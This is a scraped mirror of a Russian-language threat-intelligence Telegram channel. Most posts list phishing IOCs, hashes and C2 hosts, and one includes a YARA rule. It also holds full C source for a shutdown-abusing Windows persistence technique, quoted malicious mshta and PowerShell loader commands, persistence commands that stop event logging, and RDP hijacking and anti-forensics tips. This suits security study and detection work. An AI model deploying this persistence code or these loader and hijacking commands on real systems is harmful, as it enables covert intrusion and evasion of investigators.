Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
ByTe [ ]f Digital Life
Відкрити в Telegram
261
Підписники
Немає даних24 години
Немає даних7 днів
+1130 день
Архів дописів
#include <windows.h>
#include <stdio.h>
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) {
switch (message) {
case WM_QUERYENDSESSION:
printf("Shutdown requested. Blocking for now.\n");
ShutdownBlockReasonCreate(hWnd, TEXT("PhantomPersist Shutting down..."));
AbortSystemShutdown(NULL);
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0);
CloseHandle(hToken);
ShutdownBlockReasonDestroy(hWnd);
if (!ExitWindowsEx(EWX_RESTARTAPPS | EWX_FORCE, SHTDN_REASON_MAJOR_OTHER | SHTDN_REASON_MINOR_OTHER)) {
printf("Failed to reboot\n");
}
return TRUE;
case WM_ENDSESSION:
printf("Shutdown completed.\n");
ShutdownBlockReasonDestroy(hWnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
}
return 0;
}
DWORD WINAPI MessageLoopThread(void* param) {
// Create a hidden window
TCHAR szWindowClass[] = TEXT("PhantomPersist_MessageWindow");
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = GetModuleHandle(NULL);
wcex.hIcon = LoadIcon(NULL, IDI_APPLICATION);
wcex.hCursor = LoadCursor(NULL, IDC_ARROW);
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName = szWindowClass;
wcex.hIconSm = LoadIcon(NULL, IDI_APPLICATION);
if (!RegisterClassEx(&wcex)) {
printf("Failed to register window class.\n");
return 1;
}
HWND hWnd = CreateWindow(szWindowClass, TEXT(""), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, NULL, NULL, GetModuleHandle(NULL), NULL);
if (!hWnd) {
printf("Failed to create hidden window.\n");
return 1;
}
if (!SetProcessShutdownParameters(0x4FF, SHUTDOWN_NORETRY)) {
if (!SetProcessShutdownParameters(0x400, SHUTDOWN_NORETRY)) {
if (!SetProcessShutdownParameters(0x3FF, SHUTDOWN_NORETRY)) {
printf("Failed to set process shutdown parameters.\n");
return 1;
}
}
}
MSG msg;
while (GetMessage(&msg, NULL, 0, 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}
int main()
{
HWND hConsole = GetConsoleWindow();
if (hConsole) ShowWindow(hConsole, SW_HIDE);
if (FAILED(RegisterApplicationRestart(NULL, 0))) {
printf("Failed to register application restart\n");
return 1;
}
printf("[+] Registered application restart\n");
printf("[+] Sleeping 60 seconds to ensure registration\n");
Sleep(60000);
printf("[+] Starting message loop thread. Go ahead shutdown/restart.\n");
HANDLE hThread = CreateThread(NULL, 0, MessageLoopThread, NULL, 0, NULL);
if (!hThread) {
printf("Failed to create message loop thread.\n");
return 1;
}
CloseHandle(hThread);
while (1) {
MessageBoxA(NULL, "GELLO", "LOL", MB_OK);
Sleep(1000);
}
}
PERSISTENCE
Идея — использовать мало-заметный WinAPI-вызов
RegisterApplicationRestart, который штатно предназначен для перезапуска «упавших» приложений, но в связке с «правильным» завершением системы можно превратить его в механизм персистентности.
Для срабатывания перезапуска необходимо, чтобы перед выключением или рестартом был вызван ExitWindowsEx с флагом EWX_RESTARTAPPS (или InitiateShutdown c SHUTDOWN_RESTARTAPPS) — обычное «клик-по-Shutdown» этого не делает.
Признаки:
Появление ключей HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #<n> сразу после начала выключения.
Наличие структуры WER_PEB_HEADER_BLOCK в PEB процесса.
https://blog.phantomsec.tools/phantom-persistence "Phantom Persistence | PhantomSec Blog"Дополнительно к посту выше
Domain: zetag.ru FileName: tramp.rtf SHA256: 2e31d86d18d4ed04f73fd472e6d2a180f4488e50bd7b052fe84e56787202b052#APT #CobaltStrike #WEREWOLVES
![Интересная штука (не надо ru fuck) Отправитель: www-data@kzst45[.]ru Тема: Досудебное Вложение: рекламация.rar SHA256: a8d704](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAfACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwCxGJNi9On90VKM45T9BSJDIUXE7DgU77PJ/wA/L1d0TZjGZgPu4/AVG0jgdD+Qqf7PJ/z8P+Qo+zSf8/D/AJCi6E0yskzElGXIYHB44oqz9ndfmMzMB2IHNFF0wV0SRkBF+g71JWQurAKBhOB70v8AbHtH+RqSzWorJ/tg+kf5Gj+2D6R/kaLCuar8Ix9qKyjq+5SDswRg4BooA//Z)
+1
Интересная штука (не надо ru fuck)
Отправитель: www-data@kzst45[.]ru Тема: Досудебное Вложение: рекламация.rar SHA256: a8d704d4d9d52a59b3054e63e80e6aa206aa5815e5d4307bfeafbb61587dedfd рекламация.pdf.lnk 7c25bdd6edf7227547927925dd95b0279eba03d0483e07bab5c5d871d4e43ff0 После запуска данного lnk файла процесс forfiles.exe запускается следующим образом: "C:\Windows\System32\forfiles.exe"/pC:\Windows\System32/mc"al"c.exe/c"pow"e"rshell.mshta"h"t"t"p"s://y"i"p"."s"u"/c"e"r"t"g"o"v"r"u"f"u"c"k"."g"i"f" в следствии чего запускается процесс powershell.exe. mshta hxxps://yip[.]su/certgovrufuck.gif Cетевые IOCS dosingpumps[.]ru 91.218.228[.]26 cba.abc92[.]ru 31.207.76[.]246 lieri[.]ru abc92[.]ru Несколько user-agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoАналогично был найден
рекламация.doc 44e9cc927148f9249ed4d08dad5215be3c0facfb3b54b5260c0014245784ae6a Threat Names: CobaltStrike, CopyKittens, Metasploit, Wilted Tulip Дополнительно связывается с hxxp://xn--e1ajbcejcefx.xn--p1ai/santimrntilasjlkas (комплексон.рф)Судя по всему loader использующий CVE-2017-0199 #APT #WEREWOLVES #CobaltStrike
IOC'S FROM PHISHING
Отправитель: fbl@rsxs[.]ru, fbl@respect-art[.]ru Тема: Акт сверки Вложение: 1.zip SHA256: 1f6d6a208f4d97a9e8061929aa7b4e7c288d8e363e49fc0e3603685eb2f37d8d 8d7b668eb33bdb6d8f274f5047e1b309d0ad2f4d2843bb1ef575fac36cd71eb9 Полезная нагрузка (RedLine infostealer (RedLine)): Aкт cвepки взaимopacчeтoв пo cocтoянию нa 18.06.2025 гoдa.pdf.scr 9076de2e80388415df55e4703d8f01c082c47841eeecda5e918b6f8d29de9f45 Cетевые IOC'S myhost.servepics[.]com 196.251.66[.]118 Отправитель: Jian.Li@Wolterskluwer[.]cn Тема: RE: payment receipt from - HTDTC00001 Huaxian Tongsheng (Beijing) Digital Technology Co. Ltd Вложение: Payment receipt-985 pdf-Zip.rar SHA256: abff642801159fec3021f494c083abe3b989443713bd15ee342502d260698cfc Полезная нагрузка (FormBook): Payment receipt-985 pdf.exe SHA256: 498e2c6b408bd48faae7f5beff239c6583ddba654b3501d54869ccb1b2d1f19d Отправитель: kate@sanosplus[.]com Тема: DHL Shipment Notification: BL GH-24010030 Вложение: Arrival_Notice_pdf.arj SHA256: e2e7fb47bc9935119ae395401c89188e7733b0facb216d64a09b1f8ced7d8fd5 Полезная нагрузка (CloudEyE): Arrival_Notice_pdf.bat SHA256: 490e59193af10b0f6a037a3733096440c4ff1ba73add83dad3172e78d12415fa Cоздает powershell.exe powershell.exe"powershell.exe"-windowstyleminimized"$Prebuccal=gc -Raw 'C:\Users\User\AppData\Local\deleteriousness\preachiest\firebomb\Polyembryonate69.Vin';$Afskrabningernes=$Prebuccal.SubString(71887,3);.$Afskrabningernes($Prebuccal)""$Prebuccal=gc -Raw 'C:\Users\User\AppData\Local\deleteriousness\preachiest\firebomb\Polyembryonate69.Vin';$Afskrabningernes=$Prebuccal.SubString(71887,3);.$Afskrabningernes($Prebuccal)"
IOC'S FROM PHISHING
Отправитель: fbl@urusovgroup[.]ru
Отправитель: fbl@urusovgroup[.]ru
1.rar
Тема: Aкт cвepки
SHA256: e38b2b71875d4b14279e6c5c7fd01e677c29fba2551c21aed9b2b0931fd9625a
7550d61e58853db71e2d444e0f673c15c4c85aa4c48178073e01d915c1052fec
Полезная нагрузка: Aкт cвepки взaимopacчeтoв пo cocтoянию нa 29.05.2025 гoдa.scr
Отправитель: ventasthno@fenasa[.]cl
Тема: Inquiry_0974{6-5-2025}
Вложение: inquiry_0974-6-5-2025-pdf.zip.rar
SHA256: 480f7ae40a8e8b285c9387451cb6b842dab0a15d622978b6e853bf8b315d9c3a
Полезная нагрузка: INQUIRY_0974{6-5-2025}.zip-pdf.exe
SHA256: 0452abf430b85e00a2e5d2fdc614a71058227db04f8401f3e063dae0a141d40a
#darkgate
Интересное наблюдение...
PuttyNG.exe — это фактически «модифицированный» (или «обёрнутый») бинарник PuTTY, интегрированный в дистрибутив mRemoteNG и перенастроенный таким образом, чтобы получать из mRemoteNG все необходимые параметры (хост, порт, логин, пароль, SSH-ключ, прокси, цветовая схема и др.) и открывать SSH-сеанс в отдельном окне.
mRemoteNG (Multi-Remote Next Generation) — это форк (развитие) проекта mRemote, ориентированный на облегчённое управление множества удалённых сеансов из одного окна.
Так вот... В стандартном PuTTY не рекомендуется и, более того, невозможно передать пароль прямо через командную строку (чтобы специфично задать -pw). Однако в PuttyNG при помощи передачи опции -pw (или других специальных ключей) mRemoteNG может автоматически прокидывать сохранённый пароль.
При подключении по SSH через данную утилитку используются параметры запуска (примерно такие):
"C:\Program Files\mRemoteNG\Bin\PuttyNG.exe" -ssh -P 22 -l admin -pw MySecretPass -sessionhost <IP>
+1
RDP TRICKS
(Картинок две потому что обе нравятся)
Подключение по RDP оставляет множество значимых артефактов, при этом при стандартном подключении учётные данные могут быть кэшированы.
В журналах Windows фиксируются события: 4624 (Logon type 7, 10), 4778, 4779, 1024, 1102 (microsoft-windows-terminalservices-rdpclient/operational), 1149, 21-25 (TerminialServices - LocalSessionManager), 131 (Remote Desktop Services - RDP Core TS), 98 (Remote Desktop Services - RDP Core TS).
RDP Bitmap Cache — это попытка Windows ускорить соединение путем кэширования часто встречающихся изображений (в связи с чем у аналитиков появляется возможность собирать пазлики на работе):
Windows XP - %CURRENTUSER%\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache\ Windows 7+ - %CURRENTUSER%\AppData\Local\Microsoft\Terminal Server Client\Cache\Клиент Microsoft RDP запоминает до 10 последних использованных (MRU) серверов, хранится все это дело в (выпадающий список):
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\DefaultПодсказки имени пользователя сервера:
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\Если мы прожмем больше не спрашивать о подключениях к этому хосту то запись появится в:
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\LocalDevices\Для серверов также существует интересная функция UAL - cохраняет какой пользователь домена и в какое время взаимодействовал с определенной ролью на сервере (для анализа SumECmd), там также можно обнаружить подключения по RDP.
%WinDir%\System32\LogFiles\SUMRDP SHADOWING Подглядываем но аккуратно : ) События: 20508, 20503, 20504 Регулируется с помощью:
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 0 /fЗначение 0 → shadowing запрещён; 1 → shadowing разрешён. RDP HIJACKING Требуются права system на терминальном сервере Делаем:
quser (перечисляем сеансы, находим нужный ID-сеанса) tscon <ID-сеанса> (получаем сессию выбранного пользователя)Дополнительно артефакты конечно же фиксируются в: prefetch, Jump List, amchache, USNjrnl... Так вот, как можно простым образом лишить специалиста развлечения пособирать пазлики: 1. Использование режима public - не кэширует учётные данные, не заносит инфу по исходящим RDP-соединениям в реестр, не кэширует растровые изображения.
mstsc /v: <IP> /public2. BitmapCachePersistEnable:i:0 Ну и соответственно, если нужно что то скрыть то удаляем эти артефактики : )
RDP TRICKS
Подключение по RDP оставляет множество значимых артефактов, при этом при стандартном подключении учётные данные могут быть кэшированы.
В журналах Windows фиксируются события: 4624 (Logon type 7, 10), 4778, 4779, 1024, 1102 (microsoft-windows-terminalservices-rdpclient/operational), 1149, 21-25 (TerminialServices - LocalSessionManager), 131 (Remote Desktop Services - RDP Core TS), 98 (Remote Desktop Services - RDP Core TS).
RDP Bitmap Cache — это попытка Windows ускорить соединение путем кэширования часто встречающихся изображений (в связи с чем у аналитиков появляется возможность собирать пазлики на работе):
Windows XP - %CURRENTUSER%\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache\ Windows 7+ - %CURRENTUSER%\AppData\Local\Microsoft\Terminal Server Client\Cache\Клиент Microsoft RDP запоминает до 10 последних использованных (MRU) серверов, хранится все это дело в (выпадающий список):
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\DefaultПодсказки имени пользователя сервера:
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\Если мы прожмем больше не спрашивать о подключениях к этому хосту то запись появится в:
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\LocalDevices\Для серверов также существует интересная функция UAL - cохраняет какой пользователь домена и в какое время взаимодействовал с определенной ролью на сервере (для анализа SumECmd), там также можно обнаружить подключения по RDP.
%WinDir%\System32\LogFiles\SUMRDP SHADOWING Подглядываем но аккуратно : ) События: 20508, 20503, 20504 Регулируется с помощью:
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 0 /fЗначение 0 → shadowing запрещён; 1 → shadowing разрешён. RDP HIJACKING Требуются права system на терминальном сервере Делаем:
quser (перечисляем сеансы, находим нужный ID-сеанса) tscon <ID-сеанса> (получаем сессию выбранного пользователя)Дополнительно артефакты конечно же фиксируются в: prefetch, Jump List, amchache, USNjrnl... Так вот, как можно простым образом лишить специалиста развлечения пособирать пазлики: 1. Использование режима public - не кэширует учётные данные, не заносит инфу по исходящим RDP-соединениям в реестр, не кэширует растровые изображения.
mstsc /v: <IP> /public2. BitmapCachePersistEnable:i:0 Ну и соответственно, если нужно что то скрыть то удаляем эти артефактики : )
IOC'S FROM PHISHING
Отправитель: sfoonq@usbiotek[.]com Тема: Fwd: Payment Advice 05-22-2025 SKMBT037839378897080488904003TXT Вложение: payment-advice-05-22-2025-skmbt037839378897080488904003txt.zip SHA-256: dba587c6d62d656b7e37e00ffbfc5d5bc0d8a820c91284493ebc179145766434 Полезная нагрузка: Payment Advice 05-22-2025 SKMBT037839378897080488904003TXT.exe (FormBookFormgrabber) SHA256: a87d275ebd05d10612525aa2cc02e4d54a2a77727e32e63ea5e3e10fe0c906f9 Отправитель: practic-group.autoreply@bk[.]ru Тема: Re: Изменение статуса по Акту - сверки за отчетный период Апрель Вложение: scan2024051411360.rar Скачивается с: hxxps://cloud.mail[.]ru/public/cYRM/hcARvnHMV SHA-256: 3be31a72db10b975934ed09d29868f92dfff89fea3afdf3dd7277e9872ee45c3 Применяется техника BYOVD lyfawesmuysv.sys (WinRing0.sys) SHA256: 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 Полезная нагрузка: Сканировать1825.exe (xmrig) SHA256: 88352779a31f71a713c3098683d419bfad15c5e3a604badf1c3216fbad08b88f Cетевая активность: randomxmonero.auto.nicehash[.]com 34.149.22[.]228 92.53.116[.]105#xmrig
![IOC'S FROM PHISHING Отправители: info@ackmanic[.]com, info@wembolsar[.]com, info@cumasifoods[.]com Тема: RE: RE: FW: 2025/4/2](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAgACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwC//Z9ngZgSk+wWf/PulWT0HGaT/gI/KgCt9htM828eKX7DZf8APBKsDg9P0pcn0/SgCq1hadoEoqy3aigBewpD/SqX9rWeB+8P/fJoOrWn/PQ/98mgC93oqj/a1pn/AFh/75NH9rWn/PQ/98mgC63aiqR1a0OP3h/75NFAH//Z)
+2
IOC'S FROM PHISHING
Отправители: info@ackmanic[.]com, info@wembolsar[.]com, info@cumasifoods[.]com Тема: RE: RE: FW: 2025/4/24 order shipment Вредоносное вложение: 21900028-me-om-177172.docx SHA256: cd7029faa1d421c91f46e1deb5a449b4aa1db7a1290a39c807fba0e290802ba9 Отправитель: info@itcs-electric[.]tn Тема: Payment notice Вредоносное вложение: 221193.rar SHA256: 45bc5073e7fa4b01cda7a03dc81343182a032821d64b985a0b41d60eb08df0ca Отправитель: fbl@kgtpas[.]ru Отправитель: fbl@gdferrit[.]ru Тема: Акт сверки Вредоносное вложение: 1.zip SHA256: 4866772541b5ab893dca6905ee069b119b58778daa45fb673b7361d7b27458d2 SHA256: eddd8965ff9765ad47e9b53d9cc12b9131eb78d12a95207c253d0d37f47fe2fa Содержимое архива - Образец.rtf (документ приманка) SHA256: 79242da7c9e79479e4d400faa4be47d416c1f5caba49f40258db041c739433cc Полезная нагрузка: Aкт cвepки взaимopacчeтoв пo cocтoянию нa 20.05.2025 гoдa.scr SHA256: 96803c9ec9fb0765b70d2fdd945b5507a4ee02221c0e023b7e9f71fb5bf43a76 TTP: Прописывает себя в SOFTWARE\Microsoft\Windows\CurrentVersion\Run Сетевые обращения: myhost.servepics[.]com (196.251.66[.]118)Очень похоже на Dark Gaboon (Второй скрин)
Отправитель: info@sqqz.ooguy[.]com Тема: SAT-2025-0521-001 Вредоносное вложение: satcitas21052025_pdf.zip SHA256: dedf5204f8683ea839f3c4fac38046057b3f5ef3914cd376573ad0718098a647 Содержимое архива: SATCITAS21052025_PDF.vbs SHA256: af361cfa37d2e01488b950371a1874543fdae46db408ffe102fe8c7b19878eb5 Выполняется скрипт (скрин 3) Сетевое взаимодействие: hxxp://arquigrupoinmobiliario[.]com[.]co/adminwp/Thirtyfour.aaf arquigrupoinmobiliario[.]com[.]co 189.199.226[.]14Для детекта можно использовать Yara
rule Obfuscated_PowerShell_Downloader
{
meta:
author = "Bober"
date = "2025-05-22"
description = "Detects obfuscated PowerShell downloader scripts using dynamic function creation, WebClient download, and Invoke-Expression"
strings:
$s_gcm = /gcm\s+\w:\)\.CommandType/ nocase
$s_new_item = /n`i\s*-p\s*\$[A-Za-z0-9_]+\s*-n\s*[A-Za-z0-9_]+\s*-value\s*{[^}]*param\s*\(\$[A-Za-z0-9_]+\)/ nocase
$s_webclient = /New-Object\s+System\.Net\.WebClient/ nocase
$s_download = /DownloadFile\s*\(/ nocase
$s_iex = /iex\s+\$[A-Za-z0-9_]+/ nocase
condition:
$s_new_item and $s_webclient and $s_download and $s_iex
}
+4
IOC'S FROM PHISHING
ВПО: Список ко Дню России.exe SHA256: 66d4982d72e01f27f7c9c993fba308ef5fcb035cddffcae83c327695374f6fd2 Домены: lk.systeme-electric[.]tech new.systeme-electric[.]tech Взаимодействие: hxxp://46.8.220[.]151/scripts/bundle/jquery.min.js?d=13860597 hxxp://46.8.220[.]151/index.html?g=28e69u9902&m_=98844177 hxxp://lk.systeme-electric[.]tech:8080/kukuruza.7z hxxp://46.8.220[.]151/index.php?r=_c78273736 hxxp://46.8.220[.]151/namespaces/db/namespaces/sign-up.php?u=75p825r561 hxxp://46.8.220[.]151/bundle/scripts/jquery.js?u=73799a4x18 hxxp://46.8.220[.]151/oauth/api/database/register.php?x=4p0026818 IP - адреса 46.8.220[.]151 User agent: Mozilla/5.0 (Linux; arm_64; Android 13.0; Xiaomi 12X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 YaBrowser/23.5.5.53.00 SA/3 Mobile Safari/537.36kukuruza.7z это shellcode сгенерированный через [https://github.com/TheWover/donut](https://github.com/TheWover/donut) Используется пакер AgileDotNet Указанные выше сетевые взаимодействия с доменными именами (lk.systeme-electric[.]technew.systeme-electric[.]tech) происходит через WINWORD.EXE Коллеги с https://t.me/ptescalator дополнили информацию Семпл загружает с [https://new\[.\]systeme-electric\[.\]tech/news.html](https://new[.]systeme-electric[.]tech/news.html) ключ расшифровки url-а, с которого он будет качать свой следующий стейдж. url для скачивания стейджа таков: [http://lk\[.\]systeme-electric\[.\]tech:8080/kukuruza.7z](http://lk[.]systeme-electric[.]tech:8080/kukuruza.7z) Стейдж - это шеллкод Donut (64148edf25e50b9d62880e0e1e2466b992639d7f6889eb1a88fd199272ba8bcb), который извлекает Sliver (90e765a6648a10f3fc332284e59a05ad32c2ca2437795388e6b406b6d8dc79ac). C2 сливера 46.8.220\[.\]151 Исходный файл работает корректно только на системах с установленной локалью "ru". В последствии выяснилось что данная деятельность относится к неклассифицированной ранее APT-группировке. #APT #SLIVER
IOC'S FROM PHISHING
Отправитель: practic-group.autoreply@bk[.]ru Тема: Re: Изменение статуса по Акту - сверки за отчетный период Апрель Загружается с hxxps://cloud.mail[.]ru/public/cYRM/hcARvnHMV Загружаемый с ссылки архив с вредоносным содержимым: Scan20240514113601.rar SHA256: 3be31a72db10b975934ed09d29868f92dfff89fea3afdf3dd7277e9872ee45c3 Вредоносная нагрузка: Сканировать1825.exe (майнер Xmrig) SHA256: 88352779a31f71a713c3098683d419bfad15c5e3a604badf1c3216fbad08b88f TTP: Использует BYOVD через драйвер WinRing0.sys (C:\Windows\Temp\lyfawesmuysv.sys) Имя драйвера в данной реализации: lyfawesmuysv.sys SHA256: 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 Останавливает службу журналирования: C:\Windows\system32\sc.exe stop eventlog Нагрузку дропает в: C:\ProgramData\buhtxrilsguw\zruazhqfalvf.exe Закрепление C:\WINDOWS\system32\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RKFSXQET" /t REG_SZ /f /d "C:\Users\%USER%\AppData\Roaming\buhtxrilsguw\zruazhqfalvf.exe" C:\Windows\System32\sc.exe create "RKFSXQET" binpath="C:\ProgramData\buhtxrilsguw\zruazhqfalvf.exe"start="auto" Cетевые IOCS: 92.53.96[.]150 34.149.22[.]228 randomxmonero.auto.nicehash[.]com#xmrig
IOC'S FROM PHISHING
Отправитель: info@oiecgroup.com Тема: Product inquiry Вложение: oil-industries.7z SHA256: c9ad5c6fd828fd9aaf0735721a6ed11d2ade745618b10c7e22756317a19c5664 Вредонос: Products listed.js SHA256: cda178767af65f18a4cca8c662edf67f46a7acb018479cb5dc378194a3300148 Cкачивание с: hxxp://paste[.]ee/d/4MrZkRez/0
![IOC'S FROM PHISHING Отправитель: info@quillcall[.]com Тема: PAYMENT NOTICE Вредоносное вложение: inv9039.rar SHA256: 2d10c61d](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAYACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwC/9mhIA8scUv2SAf8ALNakHanN1p3YWIfskH9wfnR9jg/55r+ZqUUUXYWIfssH/PMUVNRRdhYQdqeRk0UUgDbRtoooAbRRRQB//9k=)
IOC'S FROM PHISHING
Отправитель: info@quillcall[.]com Тема: PAYMENT NOTICE Вредоносное вложение: inv9039.rar SHA256: 2d10c61d1c89dffcf7e6b31eab2134cffe7259e702af23fa46ea37bacfba7cc0 Полезная нагрузка: Ahpuhbdj.exe SHA256: 96de3f54bc2477c4964c30ba5298614e7e973d8659491db262ee1a7444af2b8e Cетевые IOCS: 185.196.9[.]150 mail.miniorangeman[.]com Отправитель: sales@tebalonur[.]com Отправитель: export@ackmanic[.]com Отправитель: export@wembolsar[.]com Отправитель: export@ackmanic[.]com Отправитель: sales@cumasifoods[.]com Тема: RE: Confirmare a plății Вредоносное вложение: swift-plata-din-ordinul.docx SHA256: 7cb2ee896041b9df92db5613238c3dc2426eb15feed3700e1907b37755496eb1 9B1B75AD.doc (RTF) SHA256: 0fdd4c1728bc0eb79803a4d67c2b30102ab749679ae9d01e92f9bc7eace2a137 object_00000EAB.raw SHA256: 7e96032f81482284f1404c2541f60f2f006446218441f4e4970cf6f11dc7a48b greatstepforworkingskillwithgoodthings.vbe SHA256: 2802797815808a050d2272e9b11223ec71d879be32c7225ffe2fc1474ed8c740 OpsuWuzIPUKOTEW.vbs SHA256: 565521820fa5915bfec5c23f8a28b87e6e56cc97aed7fe9a8a52c203caef481a Сетевые IOCS: 67.217.240[.]53 Отправитель: kyra@tomhappy[.]com Тема: RE: Over Due Payment - Urgent Reminder! Тема: RE: NORDTIGER PAYMENT Вредоносное вложение: scan00183pdf.arj SHA256: fa0bc1d4251b37be6329038fa47ebbd27e37eb8be7794bad3953a4f012c7e1c7 Полезная нагрузка: scan00183pdf.bat SHA256: 